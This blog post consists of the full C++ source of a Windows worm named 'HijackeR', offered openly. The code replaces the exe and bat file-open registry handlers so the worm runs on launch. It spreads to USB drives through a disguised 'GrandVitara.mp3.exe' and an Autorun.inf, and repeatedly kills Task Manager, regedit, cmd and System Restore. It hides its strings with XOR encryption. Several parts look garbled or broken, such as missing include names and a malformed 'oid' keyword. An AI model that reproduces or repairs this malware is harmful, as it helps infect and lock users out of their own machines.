/* HijackeR.cpp */
/***
*#####The HijackeR worm #####
*#####author: "v" #####
*#####Team: Legion Of Xtremers #####
******Description******
*The HijackeR worm hijacks the windows boxes and replaces the exe loader.
*The HijackeR worm can be modified to replace the loaders of any kind of files.
*The HijackeR worm executes with the logged-on user privileges.
*It infects the removable storage drives.
*
***/
#include
#include
#include
#include
#include
/*********************Constants & Macro Definition Circuit*******************/
#define MAXBUFFER 1024
#define MINBUFFER 360
#define FILEATTRIB 34
#define PROCESSPATH "C:\\Documents and Settings\\vinnu\\develop\\worm\\HijackeR\\debug\\HijackeR.exe"
#define WORMFILE "HijackeR.exe"
#define COVER "GrandVitara.mp3.exe"
#define COVERPATH "\\GrandVitara.mp3.exe"
using namespace std;
/***************Global Section**************/
HINSTANCE hInstance;
HANDLE hSnapShot;
HANDLE hProcHunted;
STARTUPINFO sui;
PROCESS_INFORMATION pi;
TOKEN_PRIVILEGES tkpn;
char procfile[MAXBUFFER], remotemodule[MAXBUFFER];
bool jump = false;
char *szKey[MINBUFFER];
char *crBuffer[MINBUFFER];
char decrypt[50][MINBUFFER];
char *szcrypt[MAXBUFFER];
char szdecrypt[50][MAXBUFFER];
/***************Shared Section**************/
//*****not implemented now******
#pragma data_seg ("HijackeD")
char szStatus[MAXBUFFER];
HMODULE hmKernel;
#pragma data_seg()
/***************Vein Functions Definition & Prototype Circuit****************/
oid keyAllocator(void) {
szKey[0] = "\xd8\x94\x8c\xac\xdd\x9a\xdf\xee\xaa\xbf\xac\xb1\x9d\xbc\x9c\x8e\x94\xda\x9f\xac\xaa\x8d\x9d\xef\xd7\xa4";
szKey[1] = "\x8f\xaa\xde\xad\xfd\xda\x9d\xe5\x9f\xac\xda\x9d\xf7\xbc\xdf\xee\xad\xbf\xec\x8c\xac\xdd\x9d\xef\xd7\xfd";
szKey[2] = "\xbf\xac\xaa\x8d\xd8\x97\xdf\xe4\xcd\xbf\xa2\xa9\xc7\xbc\xb3\x9e\x94\xfa\xfc\xac\xbf\xac\xaa\x8d\xd9\xf4";
szKey[3] = "\xbb\x9c\x8c\xcd\xb9\xc1\xdf\xee\x8d\xb1\x9c\xca\xee\xbc\x9c\x8e\x94\xdc\xeb\x8c\xac\xdd\x9d\xef\xd7\xc6";
szKey[4] = "\xcb\xb1\xb3\xac\xdd\x9a\xd8\xb3\xbd\xbf\xcc\xda\xb3\xbc\x9c\xce\x94\xdf\xee\xad\xbf\xdd\x9d\xd8\xd7\x99";
szKey[5] = "\xfd\xae\x8c\xae\xb3\xe9\xdf\xee\xaf\xea\x9d\xe5\xac\xbc\x9c\xee\xe9\xda\x9d\xb1\xac\xdd\x9d\xb6\xd7\xb1";
szKey[6] = "\xe9\xcd\x8c\xec\xdd\xcd\xab\xee\xea\xbf\xac\xb3\xdd\xbc\x9c\x8e\x94\xda\xe9\x8c\xac\xdd\x9d\xef\xd7\x9f";
szKey[7] = "\xf5\xbd\x8c\xb1\xd8\xd8\xde\x9e\x9a\xbf\x8c\xee\x9c\xfd\xea\x9d\xe5\xda\xfd\xea\x9d\xe5\x9d\xe9\xb6\xf8";
szKey[8] = "\xae\xe9\x8c\xac\xdd\xaa\xdf\xce\xa3\xbf\xfc\xcd\x8e\xbc\x9c\x8e\x94\xda\xeb\x8c\xac\xdd\x9d\xec\xd7\xa7";
szKey[9] = "\xad\xbf\xac\xaa\x8d\xbf\xac\xda\x8d\xbf\xdc\x9a\xcf\xbc\xb1\x8e\x94\xda\xeb\x8c\xac\xdd\x9d\xef\xd7\xb3";
szKey[10] = "\xea\xd4\xfe\xb1\xdd\xcd\xdf\xe9\xad\xb1\xac\xaf\x8d\xbc\x9c\x8e\x94\xda\xcb\x8c\xac\xdd\x9d\xef\xd7\xe7";
szKey[11] = "\xb1\xf4\x8c\xbc\xd8\xdf\xb1\xee\xb3\xbf\xbf\xac\xa5\x8d\x9c\x8e\x94\xd8\xe8\x8c\xac\xfd\xea\x9d\xe5\xb6";
szKey[12] = "\x90\xb3\xdf\xde\xad\xed\xb3\xe3\xad\xbf\xe9\xa8\x8d\xbc\x9c\x8e\xb1\xda\x9b\x8c\xac\xed\x9d\xdf\xd7\xa4";
szKey[13] = "\xde\xea\x9d\xe5\x8d\xb1\xdf\xae\x9d\xd8\xac\xba\xb3\xbc\x9c\xd8\x94\xda\xe9\xd8\xac\xdd\xaf\xe8\xd7\xc0";
szKey[14] = "\xcf\x9c\x8c\xaf\xdd\xfd\xea\x9d\xe5\xbf\xac\xd8\x8d\xbc\x9c\x8e\x94\xda\xeb\x8c\xac\xdd\xcd\x8f\xd3\xe9";
szKey[15] = "\xdb\xb1\xb3\xab\xab\x8a\xd4\xb1\xb8\xbd\xc6\xd1\xb0\xdd\xfa\xae\xa7\x9f\xe3\xaf\xb8\xd1\x98\xd5\xdf\x93";
szKey[16] = "\x95\xfd\x8c\xb1\xdf\xde\xfc\xfd\x9a\x9c\xfd\xea\x9c\xfd\xea\x9d\xe5\xda\xfd\xea\x9d\xe5\x9d\xe9\xb6\xf8";
szKey[17] = "\xa2\xbf\x8f\xaa\x87\x9f\x9c\xd2\x87\x8f\xcf\x8a\xcf\x9f\xf1\xde\x9c\xfd\xef\x84\xac\xd4\x94\xef\xde\xb2";
szKey[18] = "\xc5\xa1\xe7\xb5\xd8\xd3\xb1\xea\xd0\xd1\x9c\xfd\xa7\x8d\xc7\xae\xb4\xd8\xd4\xde\x9c\xf4\xea\x9d\xe6\xd0";
szKey[19] = "\xf7\xda\x9f\xd5\xfa\x98\xa0\xd1\x82\x97\xf1\xb6\xf0\xfd\xa8\xf1\xc2\x8d\xcd\x8c\xac\xff\xc6\xa0\xb7\x84";
szKey[20] = NULL;
}
void decryptor(void) {
int maxb=19;
/*
lpszBuffer[0] = "exefile\\shell\\open\\command";
lpszBuffer[1] = "batfile\\shell\\open\\command";
lpszBuffer[2] = " \"%1\" %*";
lpszBuffer[3] = "LOX -- The Legion Of Xtremers";
lpszBuffer[4] = ".exe";
lpszBuffer[5] = "\\Autorun.inf";
lpszBuffer[6] = "[autorun]\nopen=%s";
lpszBuffer[7] = "cmd.exe";
lpszBuffer[8] = ".msc";
lpszBuffer[9] = "task";
lpszBuffer[10] = "userprofile";
lpszBuffer[11] = "\\My Documents";
lpszBuffer[12] = "hijacker.exe";
lpszBuffer[13] = "ntkernel.exe";
lpszBuffer[14] = "svchost.exe";
lpszBuffer[15] = "Kernel32.dll";
lpszBuffer[16] = "(Default)";
lpszBuffer[17] = "w";
lpszBuffer[18] = "open";
lpszBuffer[19] = "marschella-esculenta"; // antidote to kill the worm.
lpszBuffer[20] = NULL;
*/
szcrypt[0] = "\xbd\xec\xe9\xca\xb4\xf6\xba\xb2\xd9\xd7\xc9\xdd\xf1\xe0\xf3\xfe\xf1\xb4\xc3\xcf\xc5\xe0\xf0\x8e\xb9\xc0";
szcrypt[1] = "\xed\xcb\xaa\xcb\x94\xb6\xf8\xb9\xec\xc4\xbf\xf1\x9b\xe0\xb0\x9e\xc8\xd1\xb0\xef\xc3\xb0\xf0\x8e\xb9\x99";
szcrypt[2] = "\x9f\x8e\x8f\xbc\xfa\xb7\xfa\xce";
szcrypt[3] = "\xf7\xd3\xd4\xed\x94\xec\xff\xba\xe5\xd4\xbc\x86\x8b\xdb\xf5\xe1\xfa\xfc\xa4\xea\x8c\x85\xe9\x9d\xb2\xab\xde\xee\xff";
szcrypt[4] = "\xe5\xd4\xcb\xc9";
szcrypt[5] = "\xa1\xef\xf9\xda\xdc\x9b\xaa\x80\x81\x83\xf3\x83";
szcrypt[6] = "\xb2\xac\xf9\x98\xb2\xbf\xde\x80\xb7\xb5\xc3\xc3\xb8\xd2\xa1\xab\xe7";
szcrypt[7] = "\x96\xd0\xe8\x9f\xbd\xa0\xbb";
szcrypt[8] = "\x80\x84\xff\xcf";
szcrypt[9] = "\xd9\xde\xdf\xc1";
szcrypt[10] = "\x9f\xa7\x9b\xc3\xad\xbf\xb0\x8f\xc4\xdd\xc9";
szcrypt[11] = "\xed\xb9\xf5\x9c\x9c\xb0\xd2\x9b\xde\xda\xd1\xd8\xd6";
szcrypt[12] = "\xf8\xda\xb5\xbf\xce\x86\xd6\x91\x83\xda\x91\xcd";
szcrypt[13] = "\xb0\x9e\xf6\x80\xff\xdf\xba\xc2\xb3\xbd\xd4\xdf";
szcrypt[14] = "\xbc\xea\xef\xc7\xb2\x8e\x9e\xb3\x80\xc7\xc9";
szcrypt[15] = "\x90\xd4\xc1\xc5\xce\xe6\xe7\x83\x96\xd9\xaa\xbd";
szcrypt[16] = "\xbd\xb9\xe9\xd7\xbe\xab\x90\x89\xb3";
szcrypt[17] = "\xd5";
szcrypt[18] = "\xaa\xd1\x82\xdb";
szcrypt[19] = "\x9a\xbb\xed\xa6\x99\xf0\xc5\xbd\xee\xf6\xdc\xd3\x83\x9e\xdd\x9d\xa7\xe3\xb9\xed";
szcrypt[20] = NULL;
/*********** The one-time-pad decryptor-engine**************/
for (int i = 0; i < maxb; i++) {
for (int d = 0, k = 0; d < lstrlen(szcrypt); d++, k++) {
if (k == lstrlen(szKey)) k = 0;
szdecrypt[d] = szcrypt[d] ^ szKey[k];
}
szdecrypt[d] = '\0';
}
/***********************************************************/
}
void sysFunc(void) {
SHEmptyRecycleBin(NULL, NULL, SHERB_NOCONFIRMATION|SHERB_NOPROGRESSUI|SHERB_NOSOUND);
}
WINAPI defender(LPSTR szProcessName) {
HANDLE hProcess;
PROCESSENTRY32 pe = { sizeof (PROCESSENTRY32)};
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);
defStart:
if (Process32First(hSnapShot, &pe)) {
do {
if (!strcmp(pe.szExeFile, szProcessName)) {
hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pe.th32ProcessID);
TerminateProcess(hProcess, 1);
CloseHandle(hProcess);hProcess = NULL;
}
Sleep(15);
} while (Process32Next(hSnapShot, &pe));
CloseHandle(hSnapShot);hSnapShot = NULL;
}
Sleep(25);
goto defStart;
return true;
}
WINAPI killerIgniter(void) {
HANDLE killers[50];
int max = 13;
/*
char *szDenyProcs[MINBUFFER];
szDenyProcs[0] = "rstrui.exe";
szDenyProcs[1] = "tasklist.exe";
szDenyProcs[2] = "taskkill.exe";
szDenyProcs[3] = "taskman.exe";
// szDenyProcs[3] = "taskmgr.exe";
szDenyProcs[4] = "regedit.exe";
szDenyProcs[5] = "reg.exe";
szDenyProcs[6] = "regdit32.exe";
szDenyProcs[7] = "regdit.exe";
szDenyProcs[8] = "cmd.exe";
szDenyProcs[9] = "mmc.exe";
szDenyProcs[10] = "wscript.exe";
szDenyProcs[11] = "command.exe";
szDenyProcs[12] = "MDM.exe";
szDenyProcs[13] = NULL;
*/
/*****************Decryption Circuit********************/
crBuffer[0] = "\xaa\xe7\xf8\xde\xa8\xf3\xf1\x8b\xd2\xda";
crBuffer[1] = "\xfb\xcb\xad\xc6\x91\xb3\xee\x91\xb1\xc9\xa2\xf8";
crBuffer[2] = "\xcb\xcd\xd9\xe6\xb3\xfe\xb3\x88\xe3\xda\xda\xcc";
// crBuffer[3] = "\xcf\xfd\xff\xa6\xd4\xa0\xb1\xc0\xe8\xc9\xf9";
crBuffer[3] = "\xcf\xfd\xff\xa6\xd4\xa6\xad\xc0\xe8\xc9\xf9";
crBuffer[4] = "\xb9\xd4\xd4\xc9\xb9\xf3\xac\x9d\xd8\xc7\xa9";
crBuffer[5] = "\x8f\xcb\xeb\x80\xd6\x91\xba";
crBuffer[6] = "\x9b\xa8\xeb\x88\xb4\xb9\x98\xdc\xc4\xda\xd4\xd6";
crBuffer[7] = "\x87\xd8\xeb\xd5\xb1\xac\xf0\xfb\xe2\xda";
crBuffer[8] = "\xcd\x84\xe8\x82\xb8\xd2\xba";
crBuffer[9] = "\xc0\xd2\xcf\x84\xe8\xc7\xc9";
crBuffer[10] = "\x9d\xa7\x9d\xc3\xb4\xbd\xab\xc7\xc8\xc9\xc9";
crBuffer[11] = "\xd2\x9b\xe1\xd1\xb9\xb1\xd5\xc0\xd6\xc7\xda";
crBuffer[12] = "\xdd\xf7\x92\xf0\xc8\x95\xd6";
crBuffer[13] = NULL;
for (int i = 0; i < max; i++) {
for (int d = 0; d < lstrlen(crBuffer); d++) {
decrypt[d] = crBuffer[d] ^ szKey[d];
}
decrypt[d] = '\0';
}
/******************************killer threads circuit********************************/
for (int a = 0; a < max; a++) {
killers[a] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) defender, decrypt[a], 0, 0);
Sleep(15);
}
// next circuit is disabled b'coz the delay buffer is required whereas it clears off the buffer.
/* for (i = 0; i < max; i++) {
for (int d=0; d < lstrlen(decrypt); d++) {
decrypt[d] = '\0';
}
}
*/
return true;
}
BOOL procLoader(char szProc[MINBUFFER], char szParam[MAXBUFFER]) {
BOOL resProc;
for (int a=0; szProc[a] != '\0'; a++) {
szProc[a] = (char)tolower((int)szProc[a]);
}
if ((strstr(szProc, szdecrypt[7])) != NULL) {
ExitProcess(1);
} else if ((strstr(szProc, szdecrypt[8])) != NULL) {
ExitProcess(1);
} else if ((strstr(szProc, szdecrypt[9])) != NULL) {
ExitProcess(1);
// } else if ((strstr(szProc, "notepad")) != NULL || (strstr(szProc, "paint")) != NULL || (strstr(szProc, "calc")) != NULL) {
// goto checkpass;
// } else if ((strstr(szProc, "system32")) != NULL) {
// ExitProcess(1);
} else if ((strstr(szProc, szdecrypt[12])) != NULL || (strstr(szProc, szdecrypt[13])) != NULL) {
return jump = true;
} else {
// Code to do.
}
checkpass:
memset(&sui, 0, sizeof(STARTUPINFO));
sui.cb = sizeof(STARTUPINFO);
sui.hStdError = GetStdHandle(STD_ERROR_HANDLE);
sui.hStdInput = GetStdHandle(STD_INPUT_HANDLE);
sui.hStdOutput = GetStdHandle(STD_OUTPUT_HANDLE);
sui.dwFlags = STARTF_USESTDHANDLES;
char szDirectory[MAXBUFFER];
strcpy(szDirectory, getenv(szdecrypt[10]));
strcat(szDirectory, szdecrypt[11]);
resProc = CreateProcess(szProc, szParam, NULL,
NULL, TRUE, 0, NULL,
szDirectory, &sui, &pi);
return resProc;
}
BOOL oprocSniper(LPSTR szProcName) {
HANDLE hoProc;
PROCESSENTRY32 pc = { sizeof (PROCESSENTRY32)};
begin:
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);
if (Process32First(hSnapShot, &pc)) {
do {
if (!strcmp(pc.szExeFile, szProcName)) {
if (pc.th32ProcessID != GetCurrentProcessId())
hoProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pc.th32ProcessID);
TerminateProcess(hoProc, 1);
CloseHandle(hoProc);hoProc = NULL;
} else if (!strcmp(pc.szExeFile, CODENAME)) {
if (pc.th32ProcessID != GetCurrentProcessId())
hoProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pc.th32ProcessID);
TerminateProcess(hoProc, 1);
CloseHandle(hoProc);hoProc = NULL;
}
Sleep(5);
} while (Process32Next(hSnapShot, &pc));
CloseHandle(hSnapShot);
}
Sleep(20);
goto begin;
return NULL;
}
void driveCloner(void) {
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_ABOVE_NORMAL);
FILE *fp;
char drive[3], newloc[30], autof[20];
int let = 0x43;
for (int i = 0; i < 256; i++, let++) {
if (i == 255)
i = 0;
if (let > 0x5A)
let = 0x43;
drive[0] = (char)let;
drive[1]= ':';
drive[2] = '\0';
if ((GetDriveType(drive)) == 2) {
// This line fetches the removable drives.
strcpy(newloc, drive);
strcat(newloc, COVERPATH);
strcpy(autof, drive);
CopyFile(remotemodule, newloc, 0);
// If not then copy the file.
strcat(autof, szdecrypt[5]);
SetFileAttributes(autof, 28);
fp = fopen(autof, szdecrypt[17]);
if (fp != NULL) {
fprintf(fp, szdecrypt[6], COVER);
fclose(fp);
}
SetFileAttributes(newloc, FILEATTRIB);
}
Sleep(80);
}
}
DWORD WINAPI hijackSettings (void) {
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_ABOVE_NORMAL);
HKEY hResult, hResult1;
bool batsman = false;
LPCTSTR hSubKey = szdecrypt[0];
LPCTSTR hSubKey1 = szdecrypt[1];
char dat[MINBUFFER];
strcpy(dat, remotemodule);
strcat(dat, szdecrypt[2]);
if (RegOpenKeyEx(HKEY_CLASSES_ROOT, hSubKey, 0, KEY_ALL_ACCESS, &hResult) == ERROR_SUCCESS) {
if (RegOpenKeyEx(HKEY_CLASSES_ROOT, hSubKey1, 0, KEY_ALL_ACCESS, &hResult1) == ERROR_SUCCESS) {
RegDeleteValue(hResult1, szdecrypt[16]);
batsman = true;
}
RegDeleteValue(hResult, szdecrypt[16]);
while(true) {
RegSetValueEx(hResult, NULL, 0, REG_SZ, (const unsigned char *)dat, sizeof (dat) );
if (batsman == true)
RegSetValueEx(hResult1, NULL, 0, REG_SZ, (const unsigned char *)dat, sizeof (dat) );
Sleep(50);
}
}
return TRUE;
}
DWORD WINAPI privilAdj(void) {
HANDLE hToken;
hInstance = GetModuleHandle(szdecrypt[15]);
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkpn.Privileges[0].Luid);
tkpn.PrivilegeCount = 1;
tkpn.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, 0, &tkpn, sizeof (tkpn), NULL, NULL);
CloseHandle(hToken);
}
return true;
}
void titleFinder(void) {
while(true) {
SetWindowText(FindWindow(NULL, remotemodule), szdecrypt[3]);
Sleep(80);
}
}
/***************Worm's Main Engine Circuit****************/
int main(int argc, char* argv[]) {
try {
keyAllocator();
decryptor();
privilAdj();
HANDLE hSniper = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)oprocSniper, szdecrypt[13], 0, 0);
HANDLE hKiller = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)killerIgniter, NULL, 0, 0);
SetThreadPriority(hKiller, THREAD_PRIORITY_TIME_CRITICAL);
char *ptr;
ptr = argv[0];procfile[0] = '\0';
strcpy(remotemodule, getenv("allusersprofile"));
strcat(remotemodule, "\\Documents\\ntkernel.exe");
HANDLE hTitle = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)titleFinder, NULL, 0, 0);
strncpy(procfile, ptr, MAXBUFFER-1);
if ((strstr(ptr, szdecrypt[4])) == NULL) strcat(procfile, szdecrypt[4]);
char szProcess[MINBUFFER], szParameter[MAXBUFFER];
szProcess[0] = szParameter[0] = '\0';
if (argc >=2) {
strncpy(szProcess, argv[1], MINBUFFER-10);
if (argc >= 3) {
for (int i = 2 ;(i+1) <= argc; i++) {
strcat(szParameter, argv);
strcat(szParameter, " ");
}
}
procLoader(szProcess, szParameter);
}
if (jump == true) {
Sleep(11000);
}
CopyFile(procfile, remotemodule, 0);
HANDLE htHijack = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)hijackSettings, NULL, 0, 0);
SetThreadPriority(htHijack, THREAD_PRIORITY_ABOVE_NORMAL);
HANDLE hdCloner = CreateThread (0, 0,(LPTHREAD_START_ROUTINE)driveCloner, NULL, 0, 0);
SetThreadPriority(hdCloner, THREAD_PRIORITY_ABOVE_NORMAL);
sysFunc();
if (hdCloner != NULL) {
WaitForSingleObject(hdCloner, 1000);
}
ShellExecute(NULL, szdecrypt[18], remotemodule, NULL, NULL, HIDE_WINDOW);
} catch (...) {
ExitProcess(1);
}
return EXIT_SUCCESS;
}
No comments:
Post a Comment